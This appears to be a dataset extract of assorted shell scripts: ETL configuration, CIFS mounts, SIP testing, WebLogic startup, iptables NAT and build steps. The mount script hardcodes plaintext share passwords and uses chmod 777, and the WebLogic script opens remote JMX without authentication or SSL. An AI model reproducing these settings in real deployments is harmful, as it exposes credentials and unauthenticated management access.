code
stringlengths 2
1.05M
| repo_name
stringlengths 5
110
| path
stringlengths 3
922
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 2
1.05M
|
---|---|---|---|---|---|
#!/bin/bash -e
#
# Copyright (c) 2016 The Ontario Institute for Cancer Research. All rights reserved.
#
# This program and the accompanying materials are made available under the terms of the GNU Public License v3.0.
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
export run_type="dev"
export config_file="$HOME/dcc-etl/conf/etl_dev.yaml"
unset input_projects && declare -A input_projects
input_projects[14]="PACA-CA PBCA-DE"
input_projects[13]="GBM-US KIRC-US PAAD-US UCEC-US"
input_projects[13_ambiguous]=""
input_projects[12]=""
input_projects[11]=""
input_projects[10]=""
input_projects[9]=""
input_projects[8]=""
export input_projects
export expected_count=6
|
icgc-dcc/dcc-etl
|
dcc-etl-client/src/main/scripts/legacy/projects/dev.sh
|
Shell
|
gpl-3.0
| 1,536 |
#!/bin/bash
#
##
###
##################################################################################
# #
# Copyright 2018; Antonio Henrique (Fela); <[email protected]> #
# Todos os direitos reservados. #
# #
# #
# Redistribution and use of this script, with or without modification, is #
# permitted provided that the following conditions are met: #
# #
# 1. Redistributions of this script must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR IMPLIED #
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO #
# EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, #
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, #
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; #
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, #
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
##################################################################################
# #
# Repositry: #
# github.com/ahlrodrigues/slackonfig #
# bitbucket.org/ahlrodrigues/slackonfig #
# #
# Bugs, Thanks, "Constructive" reviews! #
# Send me an email, I'll be very grateful! #
# #
##################################################################################
# #
# This scripts is a free softwares, you can redistribute it and/or modifies it #
# within the terms of the GNU General Public License. #
# #
# GNU General Public License: #
# [GPL](https://pt.wikipedia.org/wiki/GNU_General_Public_License) #
# Fundação do Software Livre (FSF) Inc. 51 Franklin St, Fifth Floor, #
# Boston, MA 02110-1301 USA #
# #
##################################################################################
###
##
#
rcl=/etc/rc.d/rc.local
if [ ! -d /mnt/box1 ];then
mkdir /mnt/box1
chmod 777 /mnt/box1
echo "mount -t cifs //192.168.1.51/Volume_1/ /mnt/box1/ -o username=tonico,password=scotland,vers=1.0" >> $rcl
else
echo "mount -t cifs //192.168.1.51/Volume_1/ /mnt/box1/ -o username=tonico,password=scotland,vers=1.0" >> $rcl
fi
if [ ! -d /mnt/box2 ];then
mkdir /mnt/box2
chmod 777 /mnt/box2
echo "mount -t cifs //192.168.1.50/Volume_1/Transmission/ /mnt/box2/ -o username=tonico,password=scotland,vers=1.0" >> $rcl
else
echo "mount -t cifs //192.168.1.50/Volume_1/Transmission/ /mnt/box2/ -o username=tonico,password=scotland,vers=1.0" >> $rcl
fi
if [ ! -d /mnt/box3 ];then
mkdir /mnt/box3
chmod 777 /mnt/box3
echo "mount -t cifs //192.168.1.52/Volume_1/Transmission/ /mnt/box3/ -o username=tonico,password=scotland,vers=1.0" >> $rcl
else
echo "mount -t cifs //192.168.1.52/Volume_1/Transmission/ /mnt/box3/ -o username=tonico,password=scotland,vers=1.0" >> $rcl
fi
if [ ! -d /mnt/plexhome ];then
mkdir /mnt/plexhome
chmod 777 /mnt/box3
echo "mount -t cifs //192.168.1.52/Volume_1/Transmission/ /mnt/plexhome -o username=tonico,password=scotland,vers=1.0" >> $rcl
else
echo "mount -t cifs //192.168.1.52/Volume_1/Transmission/ /mnt/plexhome -o username=tonico,password=scotland,vers=1.0" >> $rcl
fi
if [ ! -d /mnt/plexhd1 ];then
mkdir /mnt/plexhd1
chmod 777 /mnt/plexhd1
echo "mount -t cifs //192.168.1.52/Volume_1/Transmission/ /mnt/plexhd1 -o username=tonico,password=scotland,vers=1.0" >> $rcl
else
echo "mount -t cifs //192.168.1.52/Volume_1/Transmission/ /mnt/plexhd1 -o username=tonico,password=scotland,vers=1.0" >> $rcl
fi
#Monta compartilhamento NASBOX pelo /etc/fstab
#mount -t cifs //192.168.1.210/dropbox/NET4YOU/ /home/ahlr/NASBOX/ -o username=antonio,password=tossbagscotland,iocharset=utf8,sec=ntlm,nofail,vers=1.0
#Monta compartilhamento NASBOX pelo /etc/rc.d/rc.local
#mount -t cifs //192.168.1.52/Volume_1/Transmission/ /mnt/box3/ -o username=tonico,password=scotland,vers=1.0
|
ahlrodrigues/slackonfig
|
source/scripts/mountstorage.Slackonfig.sh
|
Shell
|
gpl-3.0
| 5,797 |
sudo modprobe -r AnB
sudo modprobe AnB
|
fotonartur/qnet
|
kks_console/mod_reload.sh
|
Shell
|
gpl-3.0
| 38 |
#!/bin/sh
wd=`dirname $0`
cd $wd
test=${1:-ping}
case "$test" in
ping)
exec sipp 127.0.0.1:4060 -sf ping.xml -p 4050 -m 5 -s 30
;;
*)
echo "siptest: $1: unknown test" >&2
exit 1
;;
esac
|
tychosoft/sipwitchqt
|
testdata/siptest.sh
|
Shell
|
gpl-3.0
| 191 |
#!/usr/bin/env bash
chown -R pixel /home/pixel
chmod -R 0755 /home/pixel/www/public
# FIX ENOMEM: out of memory when installing packages
# https://stackoverflow.com/questions/26193654/node-js-catch-enomem-error-thrown-after-spawn
fallocate -l 1G /swapfile
mkswap /swapfile
swapon /swapfile
su - pixel
cd /home/pixel/www
npm install
|
pixelcanvasio/pixelcanvas
|
packer/scripts/post-receive.sh
|
Shell
|
gpl-3.0
| 335 |
#!/bin/sh
# WARNING: This file is created by the Configuration Wizard.
# Any changes to this script may be lost when adding extensions to this configuration.
# --- Start Functions ---
stopAll()
{
# We separate the stop commands into a function so we are able to use the trap command in Unix (calling a function) to stop these services
if [ "X${ALREADY_STOPPED}" != "X" ] ; then
exit
fi
# STOP DERBY (only if we started it)
if [ "${DERBY_FLAG}" = "true" ] ; then
echo "Stopping Derby server..."
${WL_HOME}/common/derby/bin/stopNetworkServer.sh >"${DOMAIN_HOME}/derbyShutdown.log" 2>&1
echo "Derby server stopped."
fi
ALREADY_STOPPED="true"
}
classCaching()
{
echo "Class caching enabled..."
JAVA_OPTIONS="${JAVA_OPTIONS} -Dlaunch.main.class=${SERVER_CLASS} -Dlaunch.class.path="${CLASSPATH}" -Dlaunch.complete=weblogic.store.internal.LockManagerImpl -cp ${WL_HOME}/server/lib/pcl2.jar"
export JAVA_OPTIONS
SERVER_CLASS="com.oracle.classloader.launch.Launcher"
}
# --- End Functions ---
# *************************************************************************
# This script is used to start WebLogic Server for this domain.
#
# To create your own start script for your domain, you can initialize the
# environment by calling @USERDOMAINHOME/setDomainEnv.
#
# setDomainEnv initializes or calls commEnv to initialize the following variables:
#
# BEA_HOME - The BEA home directory of your WebLogic installation.
# JAVA_HOME - Location of the version of Java used to start WebLogic
# Server.
# JAVA_VENDOR - Vendor of the JVM (i.e. BEA, HP, IBM, Sun, etc.)
# PATH - JDK and WebLogic directories are added to system path.
# WEBLOGIC_CLASSPATH
# - Classpath needed to start WebLogic Server.
# PATCH_CLASSPATH - Classpath used for patches
# PATCH_LIBPATH - Library path used for patches
# PATCH_PATH - Path used for patches
# WEBLOGIC_EXTENSION_DIRS - Extension dirs for WebLogic classpath patch
# JAVA_VM - The java arg specifying the VM to run. (i.e.
# - server, -hotspot, etc.)
# USER_MEM_ARGS - The variable to override the standard memory arguments
# passed to java.
# PRODUCTION_MODE - The variable that determines whether Weblogic Server is started in production mode.
# DERBY_HOME - Derby home directory.
# DERBY_CLASSPATH
# - Classpath needed to start Derby.
#
# Other variables used in this script include:
# SERVER_NAME - Name of the weblogic server.
# JAVA_OPTIONS - Java command-line options for running the server. (These
# will be tagged on to the end of the JAVA_VM and
# MEM_ARGS)
# SAVE_MEMORY - Put server in a mode where it is frugal with memory, potentially sacrificing performance to do so.
# CLASS_CACHE - Enable class caching of system classpath.
# PROXY_SETTINGS - These are tagged on to the end of the JAVA_OPTIONS. This variable is deprecated and should not
# be used. Instead use JAVA_OPTIONS
#
# For additional information, refer to "Administering Server Startup and Shutdown for Oracle WebLogic Server"
# *************************************************************************
umask 027
# Call setDomainEnv here.
DOMAIN_HOME="/Users/German/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain"
. ${DOMAIN_HOME}/bin/setDomainEnv.sh $*
SAVE_JAVA_OPTIONS="${JAVA_OPTIONS}"
SAVE_CLASSPATH="${CLASSPATH}"
# Start Derby
DERBY_DEBUG_LEVEL="0"
if [ "${DERBY_FLAG}" = "true" ] ; then
${WL_HOME}/common/derby/bin/startNetworkServer.sh >"${DOMAIN_HOME}/derby.log" 2>&1
fi
JAVA_OPTIONS="${SAVE_JAVA_OPTIONS}"
SAVE_JAVA_OPTIONS=""
CLASSPATH="${SAVE_CLASSPATH}"
SAVE_CLASSPATH=""
trap 'stopAll' 1 2 3 15
if [ "${PRODUCTION_MODE}" = "true" ] ; then
WLS_DISPLAY_MODE="Production"
else
WLS_DISPLAY_MODE="Development"
fi
if [ "${WLS_USER}" != "" ] ; then
JAVA_OPTIONS="${JAVA_OPTIONS} -Dweblogic.management.username=${WLS_USER}"
fi
if [ "${WLS_PW}" != "" ] ; then
JAVA_OPTIONS="${JAVA_OPTIONS} -Dweblogic.management.password=${WLS_PW}"
fi
if [ "${MEDREC_WEBLOGIC_CLASSPATH}" != "" ] ; then
if [ "${CLASSPATH}" != "" ] ; then
CLASSPATH="${CLASSPATH}${CLASSPATHSEP}${MEDREC_WEBLOGIC_CLASSPATH}"
else
CLASSPATH="${MEDREC_WEBLOGIC_CLASSPATH}"
fi
fi
echo "."
echo "."
echo "JAVA Memory arguments: ${MEM_ARGS}"
echo "."
echo "CLASSPATH=${CLASSPATH}"
echo "."
echo "PATH=${PATH}"
echo "."
echo "***************************************************"
echo "* To start WebLogic Server, use a username and *"
echo "* password assigned to an admin-level user. For *"
echo "* server administration, use the WebLogic Server *"
echo "* console at http://hostname:port/console *"
echo "***************************************************"
# SAVE MEMORY
if [ -f ${WL_HOME}/server/bin/saveMemory.sh ] ; then
. ${WL_HOME}/server/bin/saveMemory.sh
fi
# CLASS CACHING
if [ "${CLASS_CACHE}" = "true" ] ; then
classCaching
fi
# START WEBLOGIC
# modifique el log4j2.xml en sgte directorio para que no se cargue.
CLASSPATH="/u04/Admin/domains/base-domain/config-custom:${CLASSPATH}"
JAVA_OPTIONS="-Dweblogic.ms.port=7001 -Djava.awt.headless=true -Xmx2g -XX:MaxPermSize=1g -Djava.net.preferIPv4Stack=true ${JAVA_OPTIONS} -Djava.util.logging.config.file=/Users/German/tmp/dev-wls/debug.properties -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9010 -Dcom.sun.management.jmxremote.local.only=false -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -XX:+UseConcMarkSweepGC -XX:+CMSPermGenSweepingEnabled -XX:+CMSClassUnloadingEnabled -Dorg.apache.logging.log4j.simplelog.StatusLogger.level=TRACE "
# modifique el log4j2.xml para que no se cargue.
# son 128 bytes:
#-Dlog4j2.asyncLoggerRingBufferSize=128
# 2.11.1
# -Dlog4j2.contextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector
# -Dlog4j2.asyncLoggerRingBufferSize=128
# 2.8.2
# -DLog4jContextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector
# -DAsyncLogger.RingBufferSize=128
# async:
# -DLog4jContextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector
# -Dlog4j.configurationFile=/u04/Admin/domains/base-domain/config-custom/log4j2.xml
# disruptor:
# -Dlog4j2.contextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector
# -Dorg.apache.logging.log4j.simplelog.StatusLogger.level=TRACE
# -Dlog4j.debug
# -javaagent:/Users/German/bin/glowroot/glowroot.jar -Dglowroot.agent.id=AdminServer
# -javaagent:/Users/German/bin/xrebel/xrebel.jar
# -javaagent:/Applications/inspectIT/agent/inspectit-agent.jar -Dinspectit.repository=localhost:9070 -Dinspectit.agent.name=test1
# -verbose:class
# -XX:+UnlockCommercialFeatures -XX:+FlightRecorder -XX:+UnlockDiagnosticVMOptions -XX:+DebugNonSafepoints
# -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9999 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false
# -Dcom.sun.management.jmxremote.port=8321
# -Doracle.jdbc.Trace=true -Dweblogic.debug.DebugJDBCSQL=true -Dweblogic.log.StdoutSeverity='Debug'
# -XX:+UseConcMarkSweepGC -XX:+CMSPermGenSweepingEnabled -XX:+CMSClassUnloadingEnabled
# Please use CMSClassUnloadingEnabled in place of CMSPermGenSweepingEnabled in the future
# -XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/u04/
echo "starting weblogic with Java version:"
${JAVA_HOME}/bin/java ${JAVA_VM} -version
if [ "${WLS_REDIRECT_LOG}" = "" ] ; then
echo "Starting WLS with line:"
echo "${JAVA_HOME}/bin/java ${JAVA_VM} ${MEM_ARGS} -Dweblogic.Name=${SERVER_NAME} -Djava.security.policy=${WLS_POLICY_FILE} ${JAVA_OPTIONS} ${PROXY_SETTINGS} ${SERVER_CLASS}"
${JAVA_HOME}/bin/java ${JAVA_VM} ${MEM_ARGS} -Dweblogic.Name=${SERVER_NAME} -Djava.security.policy=${WLS_POLICY_FILE} ${JAVA_OPTIONS} ${PROXY_SETTINGS} ${SERVER_CLASS}
else
echo "Redirecting output from WLS window to ${WLS_REDIRECT_LOG}"
${JAVA_HOME}/bin/java ${JAVA_VM} ${MEM_ARGS} -Dweblogic.Name=${SERVER_NAME} -Djava.security.policy=${WLS_POLICY_FILE} ${JAVA_OPTIONS} ${PROXY_SETTINGS} ${SERVER_CLASS} >"${WLS_REDIRECT_LOG}" 2>&1
fi
stopAll
popd
# Exit this script only if we have been told to exit.
if [ "${doExitFlag}" = "true" ] ; then
exit
fi
|
devwebcl/wls_contraption
|
script/startWebLogic.sh
|
Shell
|
gpl-3.0
| 8,444 |
./rop-tool-Linux-x86-64-static g ./binary-samples/libSystem.B.dylib -B "x32x90x0a"
|
sigma-random/rop-tool
|
test/test99.sh
|
Shell
|
gpl-3.0
| 83 |
En la maquina real
iptables -I FORWARD -i vboxnet0 -j ACCEPT
iptables -I FORWARD -o vboxnet0 -j ACCEPT
iptables -t nat -I POSTROUTING -o wlan0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
En la virtual
route add default gw 192.168.56.1
|
einar-lanfranco/MatFel
|
script/habilitar_red_externa.sh
|
Shell
|
gpl-3.0
| 247 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor Boston, MA 02110-1301, USA
name=nam_conus_hires
fullname="5 km Resolution Eastern CONUS NAM Forecast Model"
baseurl="ftp://ftp.ncep.noaa.gov/pub/data/nccf/com/nam/prod/nam.%date8%/"
pattern="nam.t%run2%z.conusnest.hiresf%hour2%.tm00.grib2"
description='Data from <a href=\"http://www.ncep.noaa.gov/\">
National Centers for Environmental Prediction</a>
generated once daily is contoured and converted to kml
for forecast hours 0-36 in 1 hour increments, and 36-60 in 3 hour increments.
<h3>NOTE: This product may be preempted by the National Hurricane Center</h3>'
levels="200 200 mb
300 300 mb
500 500 mb
700 700 mb
850 850 mb
925 925 mb
1000 1000 mb"
products200="wind Wind
t Temperature
rh Relative Humidity
hgt Heights"
products300="wind Wind
t Temperature
rh Relative Humidity
hgt Heights"
products500="wind Wind
t Temperature
rh Relative Humidity
hgt Heights
thk Thickness"
products700="wind Wind
t Temperature
rh Relative Humidity
hgt Heights
thk Thickness"
products850="wind Wind
t Temperature
rh Relative Humidity
hgt Heights
thk Thickness"
products925="wind Wind
t Temperature
rh Relative Humidity
hgt Heights
thk Thickness"
products1000="wind Wind
t Temperature
rh Relative Humidity
hgt Heights"
levels2="0 0 - none"
products2="pwat Perceptible Water
pmsl Mean Sea Level Pressure
cape Convective Available Potential Energy"
times="latest Latest
00 00Z
06 06Z
12 12Z
18 18Z"
runs="latest Latest
00 00Z
06 06Z
12 12Z
18 18Z"
hours="36 1
60 3"
prodmap=" plot, HGT, hgt, 20, 36 1|60 3, -H,
diffplot, HGT, thk, 20, 36 1|60 3, , HGHT
plot, TMP, t, 1, 36 1|60 3, ,
plot, RH, rh, 10, 36 1|60 3, ,
windplot, UGRD, wind, 5, 36 1|60 3, , VGRD
plot, CAPE, cape, 200, 36 1|60 3, ,
plot, PWAT, pwat, 4, 36 1|60 3, -I,
plot, PRMSL, pmsl, 200, 36 1|60 3, -H,"
|
winkey/grib_contour
|
share/nam_conus_hires.config.sh
|
Shell
|
gpl-3.0
| 2,714 |
#!/bin/sh
#
# Tool script used to strip all unshared symbol from a shared library.
# A symbol is unshared when it is not GLOBAL and/or its visibility is not
# DEFAULT (so only exported symbol should be marked with this visibility).
if [ $# -ne 2 ]
then
echo "Usage: $0 <source-object> <dest-object>"
exit 1
fi
shared="`extract_shsym.sh func $1` `extract_shsym.sh object $1`"
for sym in $shared
do
nostrip="$nostrip -K $sym"
done
nostrip="$nostrip -K RELOC_GOT_E -K RELOC_GOT_B"
echo Not stripped symbols : "$nostrip"
$OBJCOPY -S $nostrip $1 $2
|
fixos/fixos
|
user/sharedtest/tools/strip_unshared.sh
|
Shell
|
gpl-3.0
| 554 |
#!/bin/bash
echo $1
echo $2
echo "output to: $3"
gst-launch-1.0 filesrc location=$1 ! video/x-h264,width=1920,height=1080,framerate=25/1 ! h264parse ! queue ! mux. filesrc location=$2 ! decodebin ! audioconvert ! queue ! mux. avimux name=mux ! filesink location=$3
|
i-n-g-o/ffch-phone
|
mux.sh
|
Shell
|
gpl-3.0
| 266 |
#!/bin/sh
#
# This file is protected by Copyright. Please refer to the COPYRIGHT file
# distributed with this source distribution.
#
# This file is part of GNUHAWK.
#
# GNUHAWK is free software: you can redistribute it and/or modify is under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# GNUHAWK is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see http://www.gnu.org/licenses/.
#
if [ "$1" = "rpm" ]; then
# A very simplistic RPM build scenario
if [ -e pack_k_bits_bb.spec ]; then
mydir=`dirname $0`
tmpdir=`mktemp -d`
cp -r ${mydir} ${tmpdir}/pack_k_bits_bb-1.0.0
tar czf ${tmpdir}/pack_k_bits_bb-1.0.0.tar.gz --exclude=".svn" -C ${tmpdir} pack_k_bits_bb-1.0.0
rpmbuild -ta ${tmpdir}/pack_k_bits_bb-1.0.0.tar.gz
rm -rf $tmpdir
else
echo "Missing RPM spec file in" `pwd`
exit 1
fi
else
for impl in cpp ; do
cd $impl
if [ -e build.sh ]; then
./build.sh $*
elif [ -e reconf ]; then
./reconf && ./configure && make
else
echo "No build.sh found for $impl"
fi
cd -
done
fi
|
RedhawkSDR/integration-gnuhawk
|
components/pack_k_bits_bb/build.sh
|
Shell
|
gpl-3.0
| 1,561 |
#!/bin/bash
sudo service iptables stop
sudo service httpd restart
|
uws-eresearch/owncloud
|
puphpet/files/exec-always/restart_httpd.sh
|
Shell
|
gpl-3.0
| 65 |
#!/bin/sh
if [ -e $1 ];
then
cat $1
else
echo "Oh noes, the specified file does not exist! Everything was so perfect up until now! :("
fi
|
kotct/messageboard
|
src/display_message_board.sh
|
Shell
|
gpl-3.0
| 140 |
#!/bin/bash
# =========================================================
# Get the properties file
PROPS=$1
# Get the base output directory
DIR=$2
# Get the locations file prefix
#LOC_FILE_PREFIX=$3
LOC_FILE_PREFIX=cfg/sim/locations/metric/valid-metric-loc
# =========================================================
# Build the directory if it doesn't exist
if [ ! -d "$DIR" ]; then
mkdir -p $DIR
fi
# Get the host
if [ -z $HOST ]; then
HOST=$HOSTNAME
fi
# Default values
#LOG_CONFIG=log-config/log4j-config-debug.xml
LOG_CONFIG=log-config/log4j-oscer-config.xml
MEMORYSIZE=1024M
# =========================================================
# Put all the jar files in the lib dir in the classpath
CLASSPATH=leader.jar:./:lib/:data/:cfg/
for jarFile in lib/*.jar; do
CLASSPATH=${jarFile}:$CLASSPATH
done
# =========================================================
for INDCOUNT in 20 30 40 50 #50 #15 25 100 125 150
do
FORMATTED_IND_COUNT=$(printf "%03d" $INDCOUNT)
for MAP in {1..50}
do
FORMATTED_MAP=$(printf "%05d" $MAP)
LOC_FILE="$LOC_FILE_PREFIX-$FORMATTED_IND_COUNT-seed-$FORMATTED_MAP.dat"
RESULTS_DIR="$DIR/indcount-$FORMATTED_IND_COUNT/map-$FORMATTED_MAP"
if [ ! -d "$RESULTS_DIR" ]; then
mkdir -p $RESULTS_DIR
fi
MAX_ID=`expr $INDCOUNT - 1`
echo IndCount [$INDCOUNT] Map [$MAP]
for INITIATOR in $(seq 0 $MAX_ID);
do
INITIATOR_ID=$(printf "Ind%05d" $INITIATOR)
# echo Map [$MAP] InitiatorID [$INITIATOR_ID]
RESULTS_FILE="$RESULTS_DIR/spatial-hidden-var-map-$FORMATTED_MAP-initiator-$INITIATOR_ID.dat"
# Run the simulation
java -cp $CLASSPATH \
-Xmx$MEMORYSIZE \
-server \
-Dhostname=$HOST \
-Dlog4j.configuration=$LOG_CONFIG \
-Drandom-seed=$MAP \
-Dsim-properties=$PROPS \
-Dresults-file=$RESULTS_FILE \
-Dindividual-count=$INDCOUNT \
-Dlocations-file=$LOC_FILE \
-Dinitiator-id=$INITIATOR_ID \
-Doverride-personality.00.id=$INITIATOR_ID \
-Drun-id=default \
-Dlogname=restricted-fixed \
edu.snu.leader.hidden.LocalSpatialSimulation > tmp.out
done
done
done
|
snucsne/bio-inspired-leadership
|
scripts/sim/perform-restricted-local-spatial-fixed-personality-exp.sh
|
Shell
|
gpl-3.0
| 2,443 |
#!/bin/sh
#desc:Delete action
#type:local
#package:odauto
# Copyright(c) 2015 OpenDomo Services SL. Licensed under GPL v3 or later
ACTPATH="/etc/opendomo/actions"
if test -f "$ACTPATH/$1.action"; then
rm -fr "$ACTPATH/$1.action"
fi
# Once deleted, back to the main script
/usr/local/opendomo/manageActions.sh
|
opalenzuela/opendomo-automation
|
usr/local/opendomo/services/syscript/delAction.sh
|
Shell
|
gpl-3.0
| 314 |
#!/bin/sh
export MAVEN_REPO=/Users/tryggvil/.maven/repository
java -classpath target/classes:$MAVEN_REPO/axis/jars/axis-1.3.jar:$MAVEN_REPO/axis/jars/axis-jaxrpc-1.3.jar:$MAVEN_REPO/commons-logging/jars/commons-logging-api-1.0.4.jar:$MAVEN_REPO/commons-discovery/jars/commons-discovery-0.2.jar:$MAVEN_REPO/axis/jars/axis-wsdl4j-1.5.1.jar:$MAVEN_REPO/axis/jars/axis-saaj-1.3.jar org.apache.axis.wsdl.Java2WSDL -o licenceservice.wsdl -l"http://licence.idega.com/services/LicenceService" -n "urn:com.idega.licence" -p"com.idega.licence" "urn:com.idega.licence" com.idega.licence.LicenceService
|
idega/com.idega.licence
|
generate_wsdl.sh
|
Shell
|
gpl-3.0
| 594 |
patch -p0 <ZfcUser.patch
|
Eddy0402/NCKUPianoClub
|
patch.sh
|
Shell
|
gpl-3.0
| 25 |
#!/bin/bash
: ${INSTALL_CHADO_SCHEMA:=1}
CHECK_FOR_CHADO=$(psql -U postgres "$POSTGRES_DB" -c 'select * from chadoprop' >/dev/null 2>&1; echo "$?")
if [[ $CHECK_FOR_CHADO -ne 0 ]]; then
# Only if set to 1 do we automatically install the schema
if [[ $INSTALL_CHADO_SCHEMA -eq 1 ]]; then
psql --username postgres --dbname "$POSTGRES_DB" < /chado.sql
fi
fi
|
erasche/docker-chado
|
load_schema.sh
|
Shell
|
gpl-3.0
| 375 |
#!/bin/bash
. ./tests/test.sh
echo "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1" > /tmp/src1
echo "2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2" > /tmp/src2
echo "3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3" > /tmp/src3
echo "4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4" > /tmp/src4
launch -v \
--gst-debug-no-color \
--gst-debug="switch:0" \
--gst-debug="convbin:0" \
\
convbin name=conv converter=identity autosink=switch \
filesrc location=/tmp/src1 ! conv. \
filesrc location=/tmp/src2 ! conv. \
filesrc location=/tmp/src3 ! conv. \
filesrc location=/tmp/src4 ! conv. \
switch name=switch ! funnel ! fdsink fd=2
# fdsink name=sink1 fd=2 \
# fdsink name=sink2 fd=2 \
# switch. ! sink1. \
# switch. ! sink2. \
|
timvideos/gst-switch
|
tests/deprecated/labs/convbin_switch.sh
|
Shell
|
gpl-3.0
| 798 |
#!/bin/sh
echo 'Compressing css'
rm -f compressed.css
for f in blueprint-screen.css MenuMatic.css style.css
do
/usr/bin/yui-compressor --type css $f >> compressed.css
done
|
fbianco/webraptor
|
example/css/compress.sh
|
Shell
|
gpl-3.0
| 176 |
#!/usr/bin/bash
######################################################
#
# File Name: log.sh
#
# Function: 通用日志模块,提供日志打印,邮件发送等功能
#
# Usage: source log
#
# Input: none
#
# Output: none
#
# Author: panwenhai
#
# Create Time: 2016-07-01 16:04:14
#
######################################################
# 日志配置
LOG_PATH=$WORK_PATH/log
LOG_DEBUG=$LOG_PATH/${PROG_NAME}.${TODAY}.log
LOG_WARN=$LOG_PATH/${PROG_NAME}.${TODAY}.log.wf
LOG_FATAL=$LOG_PATH/${PROG_NAME}.${TODAY}.log.wf
MAIL_TO="[email protected]"
# 建立日志目录
if [ ! -d $LOG_PATH ]; then
mkdir -p $LOG_PATH
fi
# 日志、邮件函数
function Write_Log_Debug ()
{
time_day=`date +%m-%d`
time_hms=`date +%T`
echo "DEBUG: $time_day $time_hms $@" >> $LOG_DEBUG;
return $OK
}
function Write_Log_Warn ()
{
time_day=`date +%m-%d`
time_hms=`date +%T`
echo "WARNING: $time_day $time_hms $@" >> $LOG_WARN;
return $OK
}
function Write_Log_Fatal ()
{
time_day=`date +%m-%d`
time_hms=`date +%T`
echo "FATAL: $time_day $time_hms $@" >> $LOG_FATAL;
return $OK
}
function Send_Debug_Mail ()
{
tail $LOG_DEBUG | mail -s "$(echo -e "$PROG_NAME debug \nContent-Type: text/html")" ${MAIL_TO}
return $OK
}
function Send_Fatal_Mail ()
{
tail $LOG_FATAL | mail -s "$(echo -e "$PROG_NAME error!\nContent-Type: text/html")" ${MAIL_TO}
return $OK
}
|
icemoon1987/shell_toolkit
|
log.sh
|
Shell
|
gpl-3.0
| 1,403 |
#!/bin/bash -eu
# -e: Exit immediately if a command exits with a non-zero status.
# -u: Treat unset variables as an error when substituting.
#
# Copyright (C) 2013 Royal Observatory, University of Edinburgh, UK
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
cd /home/pyrothorn/
python setup.py install
